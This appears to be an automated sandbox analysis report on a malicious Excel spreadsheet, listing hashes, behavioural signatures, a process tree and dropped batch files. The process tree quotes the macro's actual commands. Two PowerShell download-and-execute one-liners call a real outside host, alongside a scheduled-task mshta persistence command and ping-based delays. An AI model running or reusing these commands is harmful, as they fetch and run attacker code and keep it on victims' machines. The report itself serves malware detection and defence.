Analysis
-
max time kernel
137s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
16-08-2022 07:46
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Exploit.Siggen3.17232.7754.xls
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
SecuriteInfo.com.Exploit.Siggen3.17232.7754.xls
Resource
win10v2004-20220812-en
General
-
Target
SecuriteInfo.com.Exploit.Siggen3.17232.7754.xls
-
Size
33KB
-
MD5
fba667decfca0daf6f92277fec2d16cf
-
SHA1
e78d07658f5a3461d43f4a84747455ef025eab09
-
SHA256
3ae788e07d265a5c6d9d79c13aea5769812c205d22a89b338ab8764cd9b364f1
-
SHA512
04e59d93c8fdda2461a4d353f2cf7de4e526a54d441bfb32ffd883bdbb3db6e2d5081be31d6da61fe06b24690515278766d852fff9db5c764099032abbafe048
Malware Config
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.execmd.execmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2824 3404 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3164 3404 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4208 3404 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4240 3404 cmd.exe EXCEL.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 27 2224 powershell.exe 28 1916 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 4228 taskkill.exe -
Runs ping.exe 1 TTPs 4 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEpid process 4340 PING.EXE 1732 PING.EXE 4320 PING.EXE 3572 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3404 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 2224 powershell.exe 2224 powershell.exe 1916 powershell.exe 1916 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
taskkill.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4228 taskkill.exe Token: SeDebugPrivilege 2224 powershell.exe Token: SeDebugPrivilege 1916 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 3404 EXCEL.EXE 3404 EXCEL.EXE 3404 EXCEL.EXE 3404 EXCEL.EXE 3404 EXCEL.EXE 3404 EXCEL.EXE 3404 EXCEL.EXE 3404 EXCEL.EXE 3404 EXCEL.EXE 3404 EXCEL.EXE 3404 EXCEL.EXE 3404 EXCEL.EXE -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
EXCEL.EXEcmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3404 wrote to memory of 2824 3404 EXCEL.EXE cmd.exe PID 3404 wrote to memory of 2824 3404 EXCEL.EXE cmd.exe PID 3404 wrote to memory of 3164 3404 EXCEL.EXE cmd.exe PID 3404 wrote to memory of 3164 3404 EXCEL.EXE cmd.exe PID 3404 wrote to memory of 4208 3404 EXCEL.EXE cmd.exe PID 3404 wrote to memory of 4208 3404 EXCEL.EXE cmd.exe PID 3404 wrote to memory of 4240 3404 EXCEL.EXE cmd.exe PID 3404 wrote to memory of 4240 3404 EXCEL.EXE cmd.exe PID 2824 wrote to memory of 4340 2824 cmd.exe PING.EXE PID 2824 wrote to memory of 4340 2824 cmd.exe PING.EXE PID 3164 wrote to memory of 1732 3164 cmd.exe PING.EXE PID 3164 wrote to memory of 1732 3164 cmd.exe PING.EXE PID 4240 wrote to memory of 3572 4240 cmd.exe PING.EXE PID 4240 wrote to memory of 3572 4240 cmd.exe PING.EXE PID 4208 wrote to memory of 4320 4208 cmd.exe PING.EXE PID 4208 wrote to memory of 4320 4208 cmd.exe PING.EXE PID 4208 wrote to memory of 1048 4208 cmd.exe cmd.exe PID 4208 wrote to memory of 1048 4208 cmd.exe cmd.exe PID 1048 wrote to memory of 2224 1048 cmd.exe powershell.exe PID 1048 wrote to memory of 2224 1048 cmd.exe powershell.exe PID 4208 wrote to memory of 4164 4208 cmd.exe cmd.exe PID 4208 wrote to memory of 4164 4208 cmd.exe cmd.exe PID 4164 wrote to memory of 4228 4164 cmd.exe taskkill.exe PID 4164 wrote to memory of 4228 4164 cmd.exe taskkill.exe PID 2824 wrote to memory of 1760 2824 cmd.exe cmd.exe PID 2824 wrote to memory of 1760 2824 cmd.exe cmd.exe PID 1760 wrote to memory of 1916 1760 cmd.exe powershell.exe PID 1760 wrote to memory of 1916 1760 cmd.exe powershell.exe PID 3164 wrote to memory of 2928 3164 cmd.exe cmd.exe PID 3164 wrote to memory of 2928 3164 cmd.exe cmd.exe PID 2928 wrote to memory of 1516 2928 cmd.exe schtasks.exe PID 2928 wrote to memory of 1516 2928 cmd.exe schtasks.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen3.17232.7754.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c ping -n 80 127.0.0.1 & %public%\Outlook.bat exit2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping -n 80 127.0.0.13⤵
- Runs ping.exe
-
C:\Windows\system32\cmd.execmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c ping -n 85 127.0.0.1 & %public%\task.bat exit2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping -n 85 127.0.0.13⤵
- Runs ping.exe
-
C:\Windows\system32\cmd.execmd /c schtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\cmd.execmd /c ping -n 10 127.0.0.1 & %public%\DefenderFile.bat exit2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping -n 10 127.0.0.13⤵
- Runs ping.exe
-
C:\Windows\system32\cmd.execmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c start /min taskkill /f /im WINWORD.EXE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im WINWORD.EXE4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c ping -n 7 127.0.0.1 & %public%\KilFile.bat exit2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping -n 7 127.0.0.13⤵
- Runs ping.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5abc27673d9c940ad74b41c58391d2412
SHA19a31a521a521dcd0f974ce6f7a50aecc69a50df0
SHA256cb3f2adb2f5e39fbe5ae3c49837d9074a85f21e9be7eb8404444611f78a08357
SHA512c7a574f9a53d29e2212500eb48fb05f475bac1e21b858f58e0e441caabea760ba7b7425a98610bf91e66d662f70a91c210b522bbecad3f5180e1aedbf6cfcdc4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
6KB
MD5b55d9c20acad4578867c42143b3a1835
SHA11fe1330a89ccb853c14b0d4302b65c485c2edde8
SHA25631871e4235e1f3746faa8ca8eab4baf87063dbc1567eead21ba7153fc9f048fd
SHA5120d7cd16ed639ed7e6c2af57eadb8842badd3775f6645279cda631decf79f60f33af508cbc929b51e49cc7c0ce3fd0c2176d99ed3f713c1e4a70669a7069e1459
-
C:\Users\Public\DefenderFile.batFilesize
1KB
MD5ae4a0997ce01f4ebbb3f3cc0054ce933
SHA1e5bfe3b390f1208b8b6ea0317f4364005f552851
SHA256a33dd1505c2ac665e6e1fd424a048997ec0f43914b8f73037bd94dc2e89e35ce
SHA5125de2f43af7756cd7be659d6f03314240e08ecfee7bcb97b45f828ef938a0a0a84b0c36667d0447fd5bfa4851e5eef9cf98182933bda86b42af4a154b37b2f184
-
C:\Users\Public\Outlook.batFilesize
900B
MD50427a3545c2eaed3167cffe2cf5f8aba
SHA1b27f3a7d2b855f1d0b84727603add711bb6f6170
SHA256ec7da386a5fc7007e33ffdcd8ab64b6ac207d1886e04b9b60f27a95533347391
SHA512fafb712a5b636c0118128c2d448271680e66fc73fac67538f4b84c9917a7053470d7710ce508cfd82c941942e469bd3d048d7ebbcefa99797542ad026dfe038b
-
C:\Users\Public\task.batFilesize
954B
MD520a395a26f50352dc994664c3e7df533
SHA19b6407d22297b7af7c49aacd51bf42e51ced7029
SHA256c6c13b53153f21b2486096732847ddb48b8eb888bd3d6ab93ee1f958fcea1b32
SHA5122b974da0b7859584e39a9afa2fdf74fb1efba58e68d0c7b420065254f2cf017a8eb393c5f061a12f6ea79c729cebf5f81749b8cf14159ad331aae1daa7701617
-
memory/1048-148-0x0000000000000000-mapping.dmp
-
memory/1516-170-0x0000000000000000-mapping.dmp
-
memory/1732-144-0x0000000000000000-mapping.dmp
-
memory/1760-161-0x0000000000000000-mapping.dmp
-
memory/1916-166-0x00007FFA31BE0000-0x00007FFA326A1000-memory.dmpFilesize
10.8MB
-
memory/1916-167-0x00007FFA31BE0000-0x00007FFA326A1000-memory.dmpFilesize
10.8MB
-
memory/1916-162-0x0000000000000000-mapping.dmp
-
memory/2224-154-0x00007FFA26A00000-0x00007FFA274C1000-memory.dmpFilesize
10.8MB
-
memory/2224-153-0x00007FFA26A00000-0x00007FFA274C1000-memory.dmpFilesize
10.8MB
-
memory/2224-149-0x0000000000000000-mapping.dmp
-
memory/2224-152-0x000001D22A870000-0x000001D22A892000-memory.dmpFilesize
136KB
-
memory/2824-139-0x0000000000000000-mapping.dmp
-
memory/2928-169-0x0000000000000000-mapping.dmp
-
memory/3164-140-0x0000000000000000-mapping.dmp
-
memory/3404-132-0x00007FFA10630000-0x00007FFA10640000-memory.dmpFilesize
64KB
-
memory/3404-138-0x00007FFA0E470000-0x00007FFA0E480000-memory.dmpFilesize
64KB
-
memory/3404-156-0x00007FFA10630000-0x00007FFA10640000-memory.dmpFilesize
64KB
-
memory/3404-157-0x00007FFA10630000-0x00007FFA10640000-memory.dmpFilesize
64KB
-
memory/3404-158-0x00007FFA10630000-0x00007FFA10640000-memory.dmpFilesize
64KB
-
memory/3404-159-0x00007FFA10630000-0x00007FFA10640000-memory.dmpFilesize
64KB
-
memory/3404-137-0x00007FFA0E470000-0x00007FFA0E480000-memory.dmpFilesize
64KB
-
memory/3404-136-0x00007FFA10630000-0x00007FFA10640000-memory.dmpFilesize
64KB
-
memory/3404-135-0x00007FFA10630000-0x00007FFA10640000-memory.dmpFilesize
64KB
-
memory/3404-133-0x00007FFA10630000-0x00007FFA10640000-memory.dmpFilesize
64KB
-
memory/3404-134-0x00007FFA10630000-0x00007FFA10640000-memory.dmpFilesize
64KB
-
memory/3572-145-0x0000000000000000-mapping.dmp
-
memory/4164-150-0x0000000000000000-mapping.dmp
-
memory/4208-141-0x0000000000000000-mapping.dmp
-
memory/4228-151-0x0000000000000000-mapping.dmp
-
memory/4240-142-0x0000000000000000-mapping.dmp
-
memory/4320-146-0x0000000000000000-mapping.dmp
-
memory/4340-143-0x0000000000000000-mapping.dmp